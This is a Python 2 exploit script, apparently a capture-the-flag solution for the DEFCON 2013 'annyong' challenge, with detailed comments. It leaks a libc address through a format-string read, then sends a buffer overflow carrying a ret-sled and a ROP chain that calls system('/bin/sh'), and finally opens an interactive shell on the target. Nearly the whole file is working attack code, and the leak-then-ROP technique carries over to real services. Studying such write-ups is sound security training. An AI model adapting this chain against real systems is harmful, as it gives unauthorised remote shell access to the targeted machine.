DEFCON 2013 annyong
#!/usr/bin/env python | |
from ebil import * | |
from libformatstr import FormatStr | |
# ebil() returns setup code that `exec` binds straight into this module's
# namespace (Python 2 exec statement).  Presumably that is where LOCAL/REMOTE,
# r, sendline, p, chain, interact, hexdump, log and ELF come from -- they are
# used below but never defined or imported here.  Only run this against a
# trusted ebil checkout: whatever it returns is executed as this script.
exec ebil('./annyong', arch='x86_64')
# Every address below is rebased from this ELF, so it must be the exact libc
# build the target process maps.  Note the leak offset in the leak section is
# measured against the LOCAL system libc only (see the comment there).
if LOCAL: libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if REMOTE: libc = ELF('./libc.so.6')
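def echo(buf, ret=True):
    """Send *buf* to the target and optionally read back one reply line.

    The conversation is line-oriented on both sides (sendline / recvuntil
    '\\n'), so a newline inside *buf* would truncate the payload and
    desynchronise every later exchange.  That is rejected with a ValueError
    up front -- the original ``assert`` silently disappears under
    ``python -O``, which would turn the failure into a confusing hang.

    buf -- data to send; must not contain 0x0a
    ret -- when True, read until the next newline (dropped), hexdump the
           reply and return it; when False, send only and return None
    """
    if '\x0a' in buf:
        raise ValueError('echo: payload must not contain a newline (0x0a)')
    # 0x900 is forwarded to ebil's sendline; presumably the target's read size,
    # the overflow payload below is built to exactly that length.
    sendline(buf, 0x900)
    if not ret:
        return None
    res = r.recvuntil('\n', drop=True)
    print(hexdump(res))
    return res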
#== leak =====================
# Format-string leak: '%104$lx' asks the (presumably printf-based) echo to
# print positional argument 104 as hex, i.e. a stack slot that -- on the
# LOCAL libc build -- holds a libc pointer 0x1653c past the mapping base.
# That constant was measured for the local /lib libc only.  A REMOTE run
# loads ./libc.so.6 above but still subtracts this local offset, so
# libc_base is wrong there until the offset is re-measured for that build.
# int(..., 16) raises ValueError if the reply is not plain hex (e.g. the
# slot is not printed, or the binary answered with something else).
libc_base = int(echo('%104$lx'), 16) - 0x0001653c # LOCAL only
log.success('libc_base = ' + hex(libc_base))
#== bof ====================== | |
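def libc_str(buf, n=0):
    """Return the runtime address of the n-th occurrence of *buf* in libc.

    Runs a byte search over the libc ELF loaded above and rebases the file
    offset with the leaked ``libc_base``.  If libc holds fewer than ``n + 1``
    matches (wrong libc build, or a gadget that simply isn't there) this
    raises a LookupError naming the pattern, instead of the bare
    StopIteration that ``next()`` would otherwise leak out of the function.

    buf -- exact byte string to look for
    n   -- number of earlier matches to skip (0 = first match)
    """
    it = libc.search(buf)
    try:
        # Take matches until the (n+1)-th one is in hand.
        for _ in xrange(n + 1):
            off = next(it)
    except StopIteration:
        raise LookupError('libc has no match #%d for %r' % (n, buf))
    return libc_base + off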
def libc_a(a, n=0):
    """Locate an assembled x86_64 instruction sequence in libc.

    *a* is assembly text (e.g. ``'pop rdi; ret'``); it is assembled to bytes
    and handed to libc_str, so the hit is a raw byte match -- it may sit in
    the middle of a real instruction, which is fine for ROP gadgets.

    n -- how many earlier byte matches to skip before taking one
    """
    code = asm(a, arch='x86_64')
    return libc_str(code, n=n)
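gad_ret = libc_a('ret')
# Fill the 0x900-byte send with a sled of `ret` gadgets so that execution
# slides into the chain wherever exactly the saved return address lands;
# the 0x20 bytes of headroom are challenge-specific and not derivable here.
# `//` keeps the repeat count an int under Python 3 as well (plain `/`
# would yield a float and make the `*` fail); under the Python 2 this
# script targets it is the same floor division as before.
payload = p(gad_ret) * ((0x900 - 0x20) // 8)
payload += chain([
    # n=1: the second 'pop rdi; ret' byte match is used, presumably because
    # the first one was unusable -- re-check this if libc changes.
    libc_a('pop rdi; ret', n=1), libc_str('/bin/sh\0'),
    libc_base + libc.symbols['system'],
])
# No reply is read after the overflow; control is expected to have left the
# echo loop.  echo() refuses any 0x0a byte, so a gadget or string address
# containing a newline fails loudly here rather than being truncated.
echo(payload, ret=False)
interact()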